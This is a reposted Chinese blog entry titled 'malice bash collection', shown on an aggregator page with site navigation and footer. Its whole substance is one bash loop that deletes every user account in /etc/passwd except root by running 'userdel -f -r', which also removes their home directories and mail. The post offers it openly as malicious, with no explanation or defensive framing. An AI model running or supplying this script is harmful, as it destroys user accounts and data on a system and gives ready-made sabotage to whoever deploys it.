码迷,mamicode.com
首页 > 其他好文 > 详细

malice bash collection

时间:2018-01-23 10:51:43      阅读:163      评论:0      收藏:0      [点我收藏+]

标签:tor   bin   collect   ali   use   gre   cti   root   direct   

  • **rm all user exculde root(include user mail and directory)**

     #!/bin/bash
     for i in $(cut -d : -f 1 /etc/passwd | grep -v root)
     do
     userdel -f -r $i
     done





    如果有可能会持续更新

  • malice bash collection

    标签:tor   bin   collect   ali   use   gre   cti   root   direct   

    原文地址:http://blog.51cto.com/10973437/2064085

    (0)
    (0)
       
    举报
    评论 一句话评论(0
    登录后才能评论!
    © 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
    迷上了代码!